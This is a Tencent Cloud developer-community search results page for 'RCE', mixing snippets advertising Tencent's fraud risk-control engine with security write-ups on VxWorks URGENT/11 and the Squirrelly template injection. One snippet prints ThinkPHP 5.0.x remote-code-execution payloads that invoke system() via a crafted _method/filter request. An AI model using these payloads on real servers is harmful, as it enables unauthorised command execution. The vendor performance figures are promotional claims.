首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 腾讯云风险控制引擎RCE):基于AI与大数据构建全链路设备风险防控体系

    部署RCE与反AI欺诈全链路防控方案 腾讯云推出设备风险控制引擎RCE),基于可信设备识别与多维数据分析(设备、账户、环境、行为、情境),通过专有AI驱动专家模型识别设备风险(假用户假设备、假用户真设备 设备风险控制引擎技术架构包含:端点+云端威胁情报数据库、设备特征云建模、云验证与协议特征检测、基于恶意风险设备黑名单(含自定义恶意ROM、云手机)的欺诈设备与行为检测,并集成身份核实能力。 验证量化风险防控能力与权威背书 应用效果聚焦数据与能力: 依托腾讯十年大数据设备风险模型,涵盖超10亿移动设备,具备设备风险状态快速更新能力(数据来源:腾讯云); 客户价值:实现对BOT攻击、ATO 、金融欺诈、AI攻击、设备风险等全场景覆盖,提升风险防控精准度。 设备篡改、克隆、多应用欺诈、实时风险监测。

    19110编辑于 2026-04-09
  • 来自专栏FreeBuf

    VxWorks面临严重RCE攻击风险

    其中六个漏洞被归类为关键漏洞并可远程执行代码(RCE)。其余漏洞为拒绝服务,信息泄露、逻辑缺陷。 URGENT/11影响 URGENT/11对目前使用所有VxWorks连接的设备构成重大风险。有三种攻击方案,具体取决于网络设备位置和攻击者位置。 攻击者可以拦截打印机与云的TCP连接,并触发打印机上的URGENT / 11 RCE漏洞,最终完全控制它。 该漏洞在处理IPv4标头中的IP选项时导致堆栈溢出,从而可以RCE。它不需要在设备上运行任何特定的应用程序或配置。 由于VxWorks常被工业和医疗行业使用,因此它们都处于极其严重的风险之中。

    1.8K20发布于 2019-08-13
  • 腾讯云风险控制引擎RCE):基于AI与大数据的一站式线上业务安全防护方案

    部署AI驱动的多维风险控制引擎RCE) 腾讯云推出设备风险控制引擎RCE),以可信设备识别为基础,通过以下技术方案构建防护体系: 核心模型:采用自研AI驱动专家模型,融合动态与静态特征生成可信设备标识 量化RCE风险防控中的业务价值 RCE的应用效果通过以下数据驱动指标体现: 模型覆盖规模:依托腾讯十年大数据设备风险模型,涵盖超10亿移动设备,支持设备风险状态快速更新(数据来源:腾讯云); 金融风控场景下的典型应用实践 RCE在金融领域落地贷款堆叠、卡盗刷、欺诈转账、政策滥用等场景,具体应用包括: 设备篡改检测:识别Root/越狱设备及模拟器; 多应用欺诈拦截:追踪同一设备关联多账号的异常行为 腾讯云风险控制引擎的技术领先性与行业认可 技术领先性: 下一代AI可信设备识别:动态+静态特征AI模型生成唯一可信标识,兼具抗欺诈能力与安全可控性; 全面风险识别能力:十年大数据沉淀+超10亿设备覆盖 ,支持风险状态分钟级更新。

    17610编辑于 2026-04-09
  • 来自专栏sringboot

    python 风险控制

    https://blog.csdn.net/weixin_44580977/article/details/102475891 通常交易策略中会融入多个因子协同触发信号,在N日突破择时策略的基础上引入风险管理因子 该因子采用止盈止损机制来管理可能出现的风险,ATR指标则作为止盈止损的基准值。 ATR指标的实现 ATR指标的计算分为以下两步: 第一步为计算真实波幅TR。 触发止盈止损条件为: 当n_winATR值 > (今日收盘价格 - 买入价格),触发止盈信号,卖出股票 当n_lossATR值 > (买入价格 - 今日收盘价格),触发止损信号,卖出股票 用根据风险因子 ,控制买入卖出 import pandas_datareader as web # 融入风险管理 #股票数据获取及处理接口 import talib def GetStockDatApi(stockName N日突破择时策略相融合,将多个策略作为因子作用在一起判断走势,可以从不同的维度保证交易的可靠性,从而避免策略的不确定性所带来的交易上的风险

    1.7K20发布于 2019-11-01
  • 标题:腾讯云全栈式风控引擎RCE):风险识别领域的靠谱选择

    摘要 本文深入探讨了腾讯云全栈式风控引擎RCE)的技术价值、实施挑战、操作指南以及增强方案。通过技术解析,我们揭示了RCE风险识别领域的核心竞争力,并针对实施过程中的三大关键挑战提供了解决方案。 操作指南部分详细阐述了如何利用RCE进行风险识别和防御,同时自然融入了腾讯云产品的特性。最后,通过增强方案,我们对比了通用方案与腾讯云方案的差异,并提供了场景化案例以证明RCE的可靠性和效果。 操作指南 实施流程 接入准备:首先,需要注册腾讯云账号,并在控制台中创建RCE服务实例。 原理说明:创建实例是为了分配资源和配置服务参数。 操作示例:登录腾讯云控制台,选择“全栈式风控引擎”,点击“创建实例”并配置相关参数。 API接入:根据业务场景选择合适的API服务接口,并集成到业务系统中。 通过本文的技术指南,企业可以深入了解腾讯云全栈式风控引擎RCE)的优势和实施方法,确保在风险识别领域做出最靠谱的选择。

    39710编辑于 2025-07-28
  • 腾讯云风险控制引擎:AI驱动欺诈防御与可信设备识别

    金融行业尤其受困于贷款堆叠、卡盗刷、欺诈转账等场景,缺乏高效设备识别能力加剧了风险管控难度。 提供AI多维数据风险控制方案 腾讯云风险控制引擎RCE)基于可信设备识别技术,整合设备、账户、环境、行为及情境等多维度数据,采用AI驱动专家模型。 实现亿级设备覆盖与权威认证效能 RCE依托腾讯十年大数据积累,覆盖超过10亿移动设备,并具备设备风险状态快速更新能力。 主导制定全球首项IEEE 2813-2020大数据业务安全风险评估标准,并通过中国信通院(CAICT)业务安全能力认证。 技术领先性与行业标准制定者地位 腾讯云RCE采用动态与静态特征结合的AI设备标识生成技术,提供反欺诈与安全可控能力。

    14310编辑于 2026-04-09
  • 腾讯云风险控制引擎:基于十亿设备数据的AI反欺诈解决方案

    应对日益复杂的在线欺诈威胁 在线业务面临虚假注册、账户盗用(ATO)、BOT攻击及金融欺诈等风险,传统防御手段难以识别AI伪造、设备篡改等新型攻击方式,导致企业面临资金损失与系统安全威胁。 多维度AI风险识别与防御体系 腾讯云风险控制引擎RCE)通过动态与静态特征结合的AI模型生成可信设备标识,整合设备、环境、行为、情境等多维数据,并基于十亿级移动设备风险数据库进行实时分析。 覆盖十亿级移动设备(数据来源:腾讯十年大数据积累) 通过中国信通院(CAICT)业务安全能力认证(国内首个通过认证的风险控制产品) 主导制定IEEE 2813-2020标准(全球首个大数据业务安全风险评估国际标准 ) 连续三年入选Gartner中国安全技术成熟度曲线(2022-2024) 四次获评Forrester亚太区企业欺诈管理市场领导者 客户应用案例 某金融客户接入RCE后: 账户盗用攻击拦截率提升至99.2% 虚假注册行为识别准确率提升40% 人工审核成本降低60% 技术领先性与权威认证 采用下一代AI可信设备识别技术,实现欺诈设备与行为的精准画像 云端威胁情报库每日更新百万级风险标签 支持自定义风险规则引擎与实时策略调优

    17810编辑于 2026-04-09
  • 风险控制规则引擎:从敏捷开发工具到管理逻辑的承载者

    规则引擎+低代码协同:在流程节点里加入决策服务(比如“信用风险评估引擎”),实时调用外部数据(比如征信系统、市场情报)。 例子:销售合同审批流程中,规则引擎自动计算客户风险等级,动态分配审批路径(风险低的自动通过,风险高的就让财务介入)。效果:流程是根据业务目标来驱动的,比如风险控制,而不是光看表单填得怎么样。 实施挑战与应对挑战规则碎片化挑战国产方案改进方向规则碎片化建立企业级规则目录,强制DMN标准化接入业务-IT协作低效培训业务人员使用决策表代替PRD文档性能瓶颈支持规则引擎集群化部署结论:规则引擎是国产 长期战略:以规则引擎为载体,把华为/海尔等领军企业的管理方法论(比如“铁三角协同”“人单合一”)转化成可复用的规则资产,最终构建中国特色的管理引擎。 通过深度融合规则引擎和低代码平台,国产BMS有机会在管理逻辑数字化层面对齐国际巨头,而不是只停留在界面或功能模仿。真正的“魂”,在于用技术承载先进管理思想——这就是规则引擎的时代使命。

    36310编辑于 2025-09-15
  • 来自专栏h0cksr的小屋

    thinkphp(一) : 5.0.1~22控制RCE

    RCE版本范围 : 5.0.1~22 import requests,time args="" data={} # debug=false时无RCE,debug=true时5.0.21~22 # data s=captcha" # data="_method=__construct&filter[]=system&method=get&get[]=whoami" #debug=false时无RCE,debug s=index/index" # data="aaaa=whoami&_method=__construct&method=GET&filter[]=system" #debug=false时无RCE {})): data=get_data(data) for debug in ["false","true"]: success.append("debug="+debug+"时,成功RCE

    34720编辑于 2023-05-17
  • 来自专栏红蓝对抗

    Nodejs Squirrelly 模板引擎 RCE(CVE-2021-32819)漏洞分析

    into their applications with impacts ranging from Cross Site Scripting (XSS) to Remote Code Execution (RCE 大致原因就是 Squirrelly 通过 Express 渲染 API 将纯模板数据与引擎配置选项混合。 攻击者可以通过请求查询来覆盖并控制全局变量 defaultConfig (一组内部模板引擎配置选项)中的defaultFilter 属性。下游用户可能会无意中将不安全的行为引入他们的应用程序。 该漏洞影响范围从跨站点脚本(XSS)到远程代码执行(RCE)。 漏洞复现 这里我们在 Linux 服务器上进行测试。 而对于不得已必须使用这种技术的项目,最好做好防御措施,包括: 降低运行该进程的用户的权限 限制该进程可以访问的路径 对用户输入进行白名单控制 对于该进程可以执行的操作系统命令做白名单控制 Ending.

    1.9K10编辑于 2022-06-30
  • 来自专栏CreateAMind

    保形风险训练:保形风险控制的端到端优化

    我们的主要贡献如下: 首先,我们开发了一种用于控制广义优化确定性等价(OCE)风险风险控制方法。 3 面向优化确定性等价的共形风险控制 前一节描述了通过控制期望损失来实现风险约束(1)。然而,在现实世界高风险应用中,决策者可能希望控制风险不仅限于期望损失,特别是当他们对特定量级的损失特别敏感时。 5.2 控制电池储能运营中的CVaR尾部风险 6 结论 我们提出了共形OCE风险控制方法,这是对原始CRC(共形风险控制)过程的严格推广。 特别地,该方法使我们能够直接控制条件风险价值(CVaR)等尾部风险,而以往工作仅能控制期望损失或提供高概率风险上界。 共形OCE风险控制的主要局限性与标准CRC相同:其风险控制保证仅适用于单调且可交换(exchangeable)的损失函数。

    12310编辑于 2026-03-11
  • 来自专栏AI人工智能

    Agent安全机制:权限控制风险防范

    Agent安全机制不仅仅是简单的权限控制,而是一个涉及身份认证、访问控制、行为监控、风险评估、威胁检测的综合安全体系。 通过深入研究网络安全、信息安全、AI安全、以及零信任架构等理论与技术,我总结出了Agent安全系统的八个关键技术要素:身份认证机制、权限管理体系、行为分析引擎风险评估模型、威胁检测算法、安全响应策略、 ,需要监控和控制", "不可接受风险": "高风险,必须立即处理" } } }4.2 风险缓解策略 ": ["技术控制", "管理控制", "物理控制"], "优势": "平衡风险和收益", "劣势": "无法完全消除风险" 在身份认证方面,多因素认证和基于属性的访问控制机制,为Agent提供了细粒度的身份验证和权限管理能力。在行为监控方面,智能行为分析和威胁检测引擎的应用,使系统能够实时发现异常行为和潜在威胁。

    79410编辑于 2025-08-06
  • 来自专栏老张的求知思考世界

    控制风险,是质量保障的核心工作

    前几天转发了一篇关于变更和质量风险的文章,公众号后台有位同学留言问了这样一个问题:最大的难点是影响范围不好评估,这也是目前业界的共同痛点,有没有一种产出比较高的影响范围评估方法来控制变更带来的风险。 这篇文章,聊聊质量保障工作的一个潜在内核:控制风险风险都是来自哪里? 软件工程的本质,是聚焦软件质量,控制软件研发交付过程中的风险,这就是质量保障工作的内核。理想状态下,如果一切都按照设计和预期来百分百完美执行,那风险只存在于理论中。 所谓控制风险,其实就是通过一系列手段来对执行人不可预估的偏差进行控制,缩小不可控的范围以及带来的影响,进而保障软件的质量。 为什么管理比执行的薪资高? 控制风险的常见方法 今年年初给某国企质量部门做内部培训时,我分享的主题是全链路质量保障体系建设,其实就是针对软件生命周期的全流程来开展质量保障工作,其中的内核就是控制风险

    50620编辑于 2023-09-08
  • 来自专栏smartguys

    流程控制引擎组件化

     流程控制引擎组件化 在较大规模的业务系统中经常会有这样的模块,它按照一定的业务流程调用其它模块来实现一定的业务逻辑,我们姑且称之为流程引擎。 本文就来讨论如何将这样一个庞大的引擎进行组件化改造,使其拥有代码级的流程图,使代码的维护难度降低一个量级,让新手也可以很快知道要如何修改代码,给引擎增加新的功能。    虽然我们已经了解了引擎内部的情况,但就像图中所描绘的样子,当要给引擎增加一个新的功能的时候,新增的功能和代码很容易影响原来正确的系统,一个小局部(零件)的问题,都会影响到整个系统。 从流程组装配置列表就可以轻松看到计费控制的整个流程图,而不用再发很多时间去了解代码,进而再画流程图。代码化的流程图是自维护的,即跟实际的情况是同步的,不再需要另外地去维护。 想像一下,当你接到一个需要维护的复杂引擎的时候,这个引擎的流程图就在你面前,而不再需要你花费一个月时间,阅读数万行代码,自己一点点去画出来。

    1.3K20发布于 2018-08-31
  • 来自专栏SAS程序分享号号号

    SAS-走近Log,实现程序的“风险控制

    才是我们最终的目的,这个应用一句从别人那里“借”来的话:“风险控制”,此处的风险指的是程序的风险

    3.9K20发布于 2019-10-21
  • 来自专栏超级架构师

    RIoT控制:了解和管理风险和物联网

    在RIoT Control第六章摘录中,讨论了物联网的安全风险要求如何与安全要求相关。 以下是RIoT Control的摘录:理解和管理风险和物联网。 本章从第六章描述了物联网中的安全风险要求以及它们与安全要求的关系。 控制工业过程的意外中断系统是不可接受的。ICS中断通常必须提前几天或几周进行计划和安排。彻底的部署前测试对于确保ICS的可靠性至关重要。 除了意外停电之外,许多控制系统都不能容易地停止和启动,而不会影响生产和安全。在某些情况下,正在生产的产品或正在使用的设备比被传送的信息更为重要。 理解与在物联网中使用和采用新的安全材料相关的安全和风险取舍对于风险管理者至关重要。 可处理 与物联网安全毒性问题相关的是安全和一次性的问题。

    78120发布于 2020-07-20
  • 腾讯云全栈式风控引擎RCE)技术指南:业务风控产品推荐

    我们将解析腾讯云全栈式风控引擎RCE)的技术价值,提供实施操作指南,并对比通用方案与腾讯云方案的优势,以场景化案例结束。 技术解析 核心价值与典型场景 腾讯云全栈式风控引擎RCE)是基于人工智能技术,结合腾讯20年风控实战经验打造的风控服务。 实时性要求:在高并发场景下,如何快速响应并准确识别风险。 成本控制:如何在确保风控效果的同时,控制服务成本。 操作示例:在RCE控制台设置规则参数,如每日注册次数上限。 服务,如用户注册时调用RCE API进行风险评估。

    54010编辑于 2025-07-28
  • 来自专栏重庆的技术分享区

    RIoT控制:了解和管理风险以及物联网

    第6章的这一部分描述了物联网中的安全风险要求以及它们与安全要求之间的关系。 询问任何工业控制系统(ICS)工程师企业IT安全标准和流程是否适用于他们的环境,他/她可能会说“部分但绝对不完全”。 从工业控制系统(ICS)和IT之间早期遭遇的经验中吸取的教训现在扩展到物联网 - 将两种做法不可分割地结合在一起: ICS + IT = IoT (工业控制系统+信息技术=物联网) 试着总结一下:ICS 了解与在物联网中使用和采用新的安全材料相关的安全和风险权衡对风险管理人员至关重要。 可处理 与物联网安全中的毒性问题有关的是安全性和可处置性。 他的专长是电信级安全设计,企业风险管理,技术风险管理,安全体系结构,安全方法学,安全审计和合规性,安全程序开发和治理,国际标准开发,物联网(IoT)和国际安全标准。

    1.1K50发布于 2018-05-02
  • YashanDB数据库升级流程及风险控制

    尤其在多样化部署架构及复杂应用场景下,数据库升级过程通常面临服务中断、数据不一致与性能波动等风险。 本文围绕YashanDB数据库的升级流程进行系统解析,并基于原理和实践细节提出有效的风险控制措施,旨在帮助开发人员与数据库管理员实现升级任务的安全可控,保障业务的连续性与数据完整性。 升级过程中涉及的关键模块包括:数据库实例管理、存储引擎(HEAP、BTREE、MCOL与SCOL系列)、SQL引擎(解析、优化、执行及向量化计算)、PL引擎以及崖山集群管理服务(YCS)和崖山文件系统( 3.4 SQL引擎与PL引擎兼容性保障升级过程中,SQL引擎的解析、优化及执行计划生成机制可能更新,存在兼容风险。 四、升级风险控制建议在升级前做好完整的数据和配置备份,覆盖数据库控制文件、数据文件、redo日志以及集群配置,确保可用恢复快照。

    25010编辑于 2025-08-30
  • 标题:腾讯云T-Sec全栈式风控引擎RCE:国内风控厂商排名中的佼佼者

    摘要 本文详细介绍了腾讯云T-Sec全栈式风控引擎RCE)的技术能力、操作指南和增强方案,旨在帮助企业快速解决注册、登录、营销活动等关键场景中的欺诈问题。 RCE的核心价值在于其准确性和实时性,能够为企业提供实时的风险评估和防御。 典型场景 注册和登录安全:防止虚假注册和非法登录。 营销活动防刷:识别和阻止大规模作弊行为。 实时监控与分析:利用RCE的实时分析能力,监控并分析用户行为,识别风险。 动态扩容:根据业务量动态调整资源,以应对流量突增。 动态扩容: 在流量突增场景下,可通过腾讯云API网关的自动扩缩容能力将响应延迟控制在100ms内。 通过本文的技术指南,企业可以更深入地了解腾讯云T-Sec全栈式风控引擎RCE,并将其应用于实际业务中,以提升风控效果和稳定性。

    45310编辑于 2025-07-28
领券